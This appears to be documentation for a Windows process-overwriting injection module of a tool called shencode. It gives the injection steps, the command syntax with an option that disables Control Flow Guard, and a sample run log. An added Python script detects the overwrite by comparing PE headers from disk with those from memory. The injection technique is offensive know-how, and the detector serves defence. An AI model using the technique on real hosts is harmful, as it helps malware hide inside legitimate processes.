Process Overwriting Injection
Description
psoverwrite is only available for Windows.
The process overwriting injection module is based on hasherezade's Process Overwriting implementation.
The injection proceeds in the following steps:
- Create a suspended process
- Prepare the payload and adjust it to the target image size
- Overwrite the PE image in memory
- Adjust the section protections
- Resume and smile :-)
This technique does not work while Control Flow Guard (CFGuard) is enabled for the target, so use --nocfg: it creates the target process with a mitigation policy flag that disables CFGuard for that process.
Command
shencode inject psoverwrite [-h] -p PAYLOAD -t TARGET [-n]
options:
-h, --help show this help message and exit
-p, --payload Payload, which overwrites the target
-t, --target Target process, to overwrite
-n, --nocfg Create the process with CFGuard disabled
Example Output
[PROCESS-OVERWRITE]-[0.1.1]
[#] CFGuard mitigation will be applied!
[*] Create suspended Process...
[+] CreateProcess successful! PID: 23964
[#] Base address found: 0x7ff7de100000
[*] Processing target image
[+] Target image base: 0x140000000 - Size: 61440
[*] Processing payload image
[+] Payload image base: 0x140000000 - Size: 28672
[*] Mapping memory image
[#] Padding image to target size, adding 36352 bytes
[*] Writing to process memory
[+] 61440 bytes written to target process
[#] Entry point is 0x7ff7de1012c0
[*] Redirecting code flow to new entry point
[#] RCX value changed to 0x7ff7de1012c0
[*] ResumeThread PID: 23964
[+] DONE!
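A defender-side check, added here as an example and not part of shencode or hasherezade's code: after the steps above, the mapped image no longer agrees with the executable on disk (a different entry point RVA, a different section table, an image padded to the target size, and sections that may be writable and executable after the protection adjustment). The script parses those PE32+ header fields from two constructed header blobs standing in for the on-disk file and a dump of the process image, and lists the mismatches; the offsets are the standard PE32+ layout, the sample values are made up.

```python
import struct

def build_pe_headers(entry_rva, size_of_image, sections):
    """Build minimal constructed PE32+ headers (no code), just enough for the checks below."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                         # PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)                        # Magic
    struct.pack_into("<I", opt, 16, entry_rva)                   # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x140000000)                 # ImageBase (as in the log)
    struct.pack_into("<I", opt, 56, size_of_image)               # SizeOfImage
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, rva, vs, 0, 0, 0, 0, 0, ch)
                    for n, rva, vs, ch in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + secs

def parse_pe_headers(blob):
    """Extract the header fields that an in-memory image overwrite changes."""
    pe = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[:2] != b"MZ" or blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", blob, pe + 6)[0]
    opt_size = struct.unpack_from("<H", blob, pe + 20)[0]
    opt = pe + 24
    hdr = {"entry_rva": struct.unpack_from("<I", blob, opt + 16)[0],
           "size_of_image": struct.unpack_from("<I", blob, opt + 56)[0],
           "sections": []}
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", blob, opt + opt_size + 40 * i)
        hdr["sections"].append((f[0].rstrip(b"\0").decode(), f[2], f[1], f[9]))
    return hdr

def compare_images(disk, mem):
    """Return indicators that the mapped image no longer matches its backing file."""
    findings = []
    if mem["entry_rva"] != disk["entry_rva"]:
        findings.append(f"entry point RVA {disk['entry_rva']:#x} -> {mem['entry_rva']:#x}")
    if mem["size_of_image"] != disk["size_of_image"]:
        findings.append("SizeOfImage changed")
    if [s[0] for s in mem["sections"]] != [s[0] for s in disk["sections"]]:
        findings.append("section table changed")
    for name, _, _, chars in mem["sections"]:
        if chars & 0x20000000 and chars & 0x80000000:            # EXECUTE and WRITE both set
            findings.append(f"section {name} is writable and executable")
    return findings

# Constructed sample (entry RVA 0x12c0 and the 61440-byte image echo the example output above)
DISK = build_pe_headers(0x1000, 61440, [(b".text", 0x1000, 0x8000, 0x60000020),
                                        (b".data", 0x9000, 0x1000, 0xC0000040)])
MEM = build_pe_headers(0x12C0, 61440, [(b".text", 0x1000, 0x5000, 0xE0000020)])
```

Running compare_images(parse_pe_headers(DISK), parse_pe_headers(MEM)) reports the moved entry point, the changed section table and the RWX .text section; on a real host the second blob would come from reading the process image at its base address.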